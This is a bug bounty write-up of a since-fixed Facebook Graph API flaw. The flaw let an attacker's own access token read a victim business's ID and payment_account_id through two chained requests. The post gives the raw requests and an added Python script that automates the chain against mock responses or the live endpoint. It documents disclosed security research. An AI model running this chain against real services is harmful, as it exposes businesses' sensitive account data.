Posted on January 26, 2020

Disclose Facebook Business Account ID

The Graph API field “business” on nodes of type “application” could be used to infer the Business Account ID associated with a Facebook application. On its own, the Business Account ID is a public identifier, and Facebook does not consider disclosing it a privacy or security issue. The bug was still valid, though, because a malicious user could use it to infer which assets of type “app” belonged to a business, and vice versa. I was debating whether to report it or not. Luckily I was also able to infer one more field, “payment_account_id”, which is a sensitive field. It was time to report the issue.

Proof of concept

Using an attacker's own access_token, it was possible to retrieve the data with two chained requests: the first reads the business associated with the application, the second reads the sensitive fields of that business.

GET /v3.1/{application-id}/?fields=id,name,business
Host: graph.facebook.com
GET /v3.1/{business-id}/?fields=primary_page,payment_account_id
Host: graph.facebook.com
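The following script chains the two requests above so the disclosure can be reproduced, and re-run after a fix as a regression check (the second read should then come back as a Graph API error rather than a payment account ID). This is an added example, not the author's code or Facebook's: the application ID, business ID, token and the canned responses in make_fake_fetch are all constructed for illustration, and the error message text is made up in the shape of a Graph API error object.

```python
"""Chain the two Graph API reads from the write-up (added example, not the author's code).

Step 1: GET /v3.1/{application-id}?fields=id,name,business
Step 2: GET /v3.1/{business-id}?fields=primary_page,payment_account_id
The IDs, token and canned responses below are constructed for this example.
"""
import json
import urllib.error
import urllib.parse
import urllib.request

GRAPH = "https://graph.facebook.com/v3.1"


def build_url(node_id, fields, access_token):
    """Build the URL for `GET /v3.1/{node_id}?fields=...&access_token=...`."""
    query = urllib.parse.urlencode({"fields": ",".join(fields),
                                    "access_token": access_token})
    return f"{GRAPH}/{urllib.parse.quote(str(node_id))}?{query}"


def http_fetch(url):
    """Default fetcher: real HTTPS GET returning the JSON body as a dict.

    The Graph API reports errors as a JSON object with a 4xx status, so the
    body of an HTTPError is parsed too instead of letting it propagate."""
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return json.load(resp)
    except urllib.error.HTTPError as e:
        return json.load(e)


def infer_business_assets(app_id, access_token, fetch=http_fetch):
    """Run the two-step chain and report what the token could read.

    Returns business_id, payment_account_id, primary_page and a list of
    Graph API error messages, so the same call doubles as a regression
    check: once the field is protected, `payment_account_id` stays None
    and `errors` is non-empty."""
    result = {"business_id": None, "payment_account_id": None,
              "primary_page": None, "errors": []}

    step1 = fetch(build_url(app_id, ["id", "name", "business"], access_token))
    if "error" in step1:
        result["errors"].append(step1["error"].get("message", "unknown error"))
        return result
    business = step1.get("business")
    if not business:
        return result  # token cannot see the association; nothing to chain
    business_id = business["id"] if isinstance(business, dict) else str(business)
    result["business_id"] = business_id

    step2 = fetch(build_url(business_id, ["primary_page", "payment_account_id"],
                            access_token))
    if "error" in step2:
        result["errors"].append(step2["error"].get("message", "unknown error"))
        return result
    result["payment_account_id"] = step2.get("payment_account_id")
    page = step2.get("primary_page")
    result["primary_page"] = page.get("id") if isinstance(page, dict) else page
    return result


def make_fake_fetch(fixed=False):
    """Constructed stand-in for graph.facebook.com (no network needed).

    fixed=False mimics the behaviour the write-up reports; fixed=True mimics
    a server that refuses the sensitive field. All IDs and messages here are
    made up for the example."""
    app_id, biz_id = "111111111111111", "222222222222222"

    def fake_fetch(url):
        path = urllib.parse.urlparse(url).path
        if path.endswith("/" + app_id):
            return {"id": app_id, "name": "Victim App",
                    "business": {"id": biz_id, "name": "Victim Business"}}
        if path.endswith("/" + biz_id):
            if fixed:
                return {"error": {"message": "Permission denied reading field "
                                             "payment_account_id (constructed)",
                                  "type": "OAuthException", "code": 100}}
            return {"id": biz_id, "primary_page": {"id": "333333333333333"},
                    "payment_account_id": "444444444444444"}
        return {"error": {"message": "Unsupported get request (constructed)",
                          "code": 100}}
    return fake_fetch


if __name__ == "__main__":
    for fixed in (False, True):
        print("fixed" if fixed else "vulnerable",
              infer_business_assets("111111111111111", "attacker-token",
                                    fetch=make_fake_fetch(fixed=fixed)))
```

To run it against the real endpoint, drop the `fetch=` argument and pass a token that has no role in the target business; a non-empty `payment_account_id` in the result is the finding, an entry in `errors` is the expected post-fix behaviour.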
PoC Video:

Impact

This could have let a malicious user obtain the Payment Account ID and Business Account ID of a victim business using only their own access_token.

Timeline

  • 18 Oct, 2018 – Initial Report Sent.
  • 02 Nov, 2018 – Acknowledgment of Report.
  • 20 Feb, 2019 – Issue Fixed.
  • 03 May, 2019 – $1500 Bounty Awarded.

Categories: Security, Writeup
